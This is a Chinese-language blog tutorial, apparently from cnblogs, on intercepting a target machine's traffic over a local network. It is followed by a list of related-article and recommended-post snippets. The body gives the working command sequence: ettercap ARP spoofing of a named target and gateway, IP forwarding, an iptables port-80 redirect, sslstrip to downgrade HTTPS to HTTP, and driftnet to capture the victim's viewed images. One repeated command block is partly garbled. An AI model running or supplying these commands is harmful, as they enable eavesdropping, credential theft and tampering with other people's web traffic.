环境准备:kali系统

  因为kali系统自带ettercap,比较方便, 不需要安装

  ifcofing命令查看当前网关 ,当前的IP是: 172.16.42.1

  查找局域网所有主机

  通过netdiscover获取到当前目标IP:172.16.42.131

  启动ettercap

  启动ettercap , wlan0为网卡端口, -T为文字显示, -M art:remote为双向arp欺骗, /172.16.42.131//为攻击的目标机器IP , /172.16.42.1//为网关地址(注, 在不同系统和不同的ettercap版本中, 参数可能不一样, 具体要看你的环境和ettercap版本)

ettercap -i wlan0 -T -M arp:remote /172.16.42.131// /172.16.42.1//

  过滤https协议成http

  重新打开一个命令行窗口,分别执行下面三个命令行,

  echo 1 > /proc/sys/net/ipv4/ip_forward   开启数据重定向

  iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 10000  开启80端口的数据转发到10000端口

  sslstrip -l 10000  执行sslstrip欺骗,把网页中的https协议转换为http协议

echo  > /proc/sys/net/ipv4/ip_forward 
iptalbes -t nat -F //清除类型为nat的iptables

iptables -t nat -A PREROUTING -p tcp --destination-port  -j REDIRECT --to-ports

sslstrip -l 10000
iptables -t nat -L //查看iptables列表是否生效






  当用户浏览的网页中包含https协议,会被转化为http协议的请求


  但是sslstrip也不是万能的, 假如网页中没有https, 但是js代码绑定了跳转到https的协议请求的事件, , 那么sslstrip就失效了


  如果用户打开网页的时候请求就是https, 会导致证书认证失败, 网页一直打不开


  获取所有的图片信息


  执行arp欺骗以后, 目标机器所有的流量都会走我们的主机, 通过监听wlan0网卡, 我们可以获取和篡改目标机器的所有http请求数据和内容


  启动driftnet监听wlan0端口, 查看所有的浏览图片数据, 所有的浏览图片,尽收眼底:




driftnet -i wlan0






作者: NONO 
出处:http://www.cnblogs.com/diligenceday/ 
企业网站:http://www.idrwl.com/	
开源博客:http://www.github.com/sqqihao
QQ:287101329 
微信:18101055830
												


											
ettercap的中间人欺骗+sslstrip过滤掉https协议的更多相关文章
	

    
								
  1. ettercap的中间人欺骗
		
    环境准备:kali系统 因为kali系统自带ettercap,比较方便, 不需要安装 ifcofing命令查看当前网关 ,当前的IP是: 172.16.42.1 查找局域网所有主机 通过netdisc ...
    
		
    2. 
						
  2. Ettercap 实施中间人攻击
		
    中间人攻击(MITM)该攻击很早就成为了黑客常用的一种古老的攻击手段,并且一直到如今还具有极大的扩展空间,MITM攻击的使用是很广泛的,曾经猖獗一时的SMB会话劫持.DNS欺骗等技术都是典型的MITM ...
    
		
    3. 
						
  3. 【流量劫持】SSLStrip 的未来 —— HTTPS 前端劫持
		
    前言 在之前介绍的流量劫持文章里,曾提到一种『HTTPS 向下降级』的方案 -- 将页面中的 HTTPS 超链接全都替换成 HTTP 版本,让用户始终以明文的形式进行通信. 看到这,也许大家都会想到一 ...
    
		
    4. 
						
  4. SSLStrip 的未来 —— HTTPS 前端劫持
		
    前言 在之前介绍的流量劫持文章里,曾提到一种『HTTPS 向下降级』的方案 —— 将页面中的 HTTPS 超链接全都替换成 HTTP 版本,让用户始终以明文的形式进行通信. 看到这,也许大家都会想到一 ...
    
		
    5. 
						
  5. Https协议简析及中间人攻击原理
		
    1.基础知识 1.1 对称加密算法 对称加密算法的特点是加密密钥和解密密钥是同一把密钥K,且加解密速度快,典型的对称加密算法有DES.AES等                              ...
    
		
    6. 
						
  6. 使用ettercap构建arp欺骗构建
		
    0.准备: 安装:ettercap apt-get install cmake libncurses5-dev libssl-dev libpcap-dev libnet1-dev git clone ...
    
		
    7. 
						
  7. 针对SSL/TLS的拒绝服务攻击以及使用ettercap进行DNS欺骗
		
    一. thc-ssl-dos 1.简介 (1).SSL 协商加密对性能开销增加,大量握手请求会导致 DOS (2).利用 SSL secure Renegotiation 特性,在单一 TCP 连接中 ...
    
		
    8. 
						
  8. HTTPS 协议降级攻击原理
		
    0x00 HTTPS 在传统流行的web服务中,由于http协议没有对数据包进行加密,导致http协议下的网络包是明文传输,所以只要攻击者拦截到http协议下的数据包,就能直接窥探这些网络包的数据.  ...
    
		
    9. 
						
  9. 一篇文章为你深度解析HTTPS 协议
		
    一.前言 微信小程序如期发布,开发者在接入微信小程序过程中,会遇到以下问题: 小程序要求必须通过 HTTPS 完成与服务端通信,若开发者选择自行搭建 HTTPS 服务,那需要自行 SSL 证书申请.部 ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. Python爬虫入门:爬虫基础了解
			
    有粉丝私信我想让我出更基础一些的,我就把之前平台的copy下来了,可以粗略看一下,之后都会慢慢出. 1.什么是爬虫 爬虫,即网络爬虫,大家可以理解为在网络上爬行的一直蜘蛛,互联网就比作一张大网,而爬虫 ...
    
			
    2. 
						
  2. Scrum Meeting Alpha - 8
			
    Scrum Meeting Alpha - 8 NewTeam 2017/11/2 地点:新主楼F座二楼 任务反馈 团队成员 完成任务 计划任务 安万贺 完成了登录API的测试和包装Pull Requ ...
    
			
    3. 
						
  3. MD5 SHA1 HMAC HMAC_SHA1区别
			
    MD5.SHA1.HMAC.HMAC_SHA1区别 引言     什么是MD5,什么是SHA1,如何校验这些Hash.还有拿单个apk文件的MD5,SHA1讯问是不是原版的问题,在这里,让我们先来了解 ...
    
			
    4. 
						
  4. 【架构研习】欲善其事先利其器-Robot Framework实战演练之框架的选择
			
    (原创文章,转载请注明出处.) 之前有提到过,自己曾基于公司业务系统从无到有码过一套测试框架,但由于开发时的思想同时受限于公司业务及框架的适用性上,导致最终虽然框架可完美支持业务,但在易用性.兼容性及 ...
    
			
    5. 
						
  5. GridControl使用技巧总结,更新中...
			
    1如何禁用GridControl中单击列弹出右键菜单 设置Run Design->OptionsMenu->EnableColumnMenu 设置为:false 2如何定位到第一条数据/记 ...
    
			
    6. 
						
  6. sort学习 - LeetCode #406 Queue Reconstruction by Height
			
    用python实现多级排序,可以像C语言那样写个my_cmp,然后在sort的时候赋给参数cmp即可 但实际上,python处理cmp 是很慢的,因为每次比较都会调用my_cmp:而使用key和rev ...
    
			
    7. 
						
  7. 吞吐量(TPS)、QPS、并发数、响应时间(RT)概念
			
    开发的原因,需要对吞吐量(TPS).QPS.并发数.响应时间(RT)几个概念做下了解,查自百度百科,记录如下:1. 响应时间(RT)  响应时间是指系统对请求作出响应的时间.直观上看,这个指标与人对软 ...
    
			
    8. 
						
  8. 安卓开源框架SlidingMenu使用
			
    在安卓开发中,会使用很多的开源框架,这篇博文讲的是SlidingMenu--侧边栏 SlidingMenu的是一种比较新的设置界面或配置界面效果,在主界面左滑或者右滑出现设置界面, 能方便的进行各种操 ...
    
			
    9. 
						
  9. 从MVC到Ajax再到前后端分离的思考
			
    前言 一位小妹去面试前端,前端leader问了"什么是ajax?",答:"接收后台的数据,然后然后自己填充和渲染样式":一位小哥去面试后台,技术经理问了&quo ...
    
			
    10. 
						
  10. 从CentOS安装完成到生成词云python学习日记
			
    欢迎访问我的个人博客:原文链接 前言 人生苦短,我用python.学习python怎么能不搞一下词云呢是不是(ง •̀_•́)ง 于是便有了这篇边实践边记录的笔记. 环境:VMware 12pro + ...
    
			
    11.